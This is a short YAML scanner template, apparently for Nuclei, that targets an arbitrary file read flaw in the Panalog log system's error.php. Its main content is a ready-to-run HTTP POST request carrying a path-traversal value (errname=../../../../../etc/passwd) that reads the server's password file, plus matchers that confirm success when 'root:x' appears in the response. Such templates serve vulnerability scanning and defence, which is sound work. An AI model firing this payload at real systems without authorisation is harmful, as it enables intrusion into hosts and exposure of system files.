id: panalog-fileRead

info:
  name: Panalog日志系统error.php文件任意文件读取
  author: Str1am
  severity: medium
  tags: panalog,fileRead

requests:
  - raw:
      - |
        POST /error.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
        
        errname=../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "root:x"
        part: body
        condition: and
